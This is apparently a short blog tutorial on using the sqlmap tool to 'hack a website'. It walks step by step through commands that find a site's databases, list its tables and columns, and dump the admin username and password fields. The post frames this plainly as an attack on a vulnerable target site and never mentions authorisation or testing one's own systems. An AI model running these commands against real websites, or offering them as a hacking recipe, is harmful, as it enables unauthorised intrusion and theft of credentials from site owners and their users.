How to Hack a website Using SQL MAP ?
Hello ! This is Vinit with an Interesting Tutorial on SQLMAP. SQLMAP is an automated sql injection take over tool which is used to exploit websites with SQL injection Vulnerability. SQLMAP is already there in backtrack 5 and Kali Linux as Default. What SQLMAP does is , it exploits the Injection vulnerability in a website and show the attacker the Details and Critical Information about the website. hackers Look for the Admin username and Password from SQL Injection.
So lets start
What we need:
1. Backtrack or Kali Linux with SQLMAP preinstalled
2. An Sql injection Vulnerable website
First locate SQLMAP on hardisk
sqlmap -u "target website url here" --dbs
Note : "-u" is For Target URL and "--dbs" is For Databse
Hit ENTER
Now type :
python sqlmap.py -u "target website url here" -D "database to extract" --tables
Note: here -D is for selected database and --tables is for tables to extract
Now type :
sqlmap -u "target url" -D " selected Database" -T "selected-Table" --columns
Note : "-T" is for selected table which is admin and --columns is for columns to extract.
Now type :
sqlmap -u "target url" -D " selected Database" -T "selected Table" -C "selected Column" --dump
Note here -C is for selected Column and --dump is for dumping all data in that column
Result of Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" -C user --dump
Result of sqlmap -u "target url" -D " selected Database" -T "selected Table" -C password --dump
thanks :)
0 comments:
Post a Comment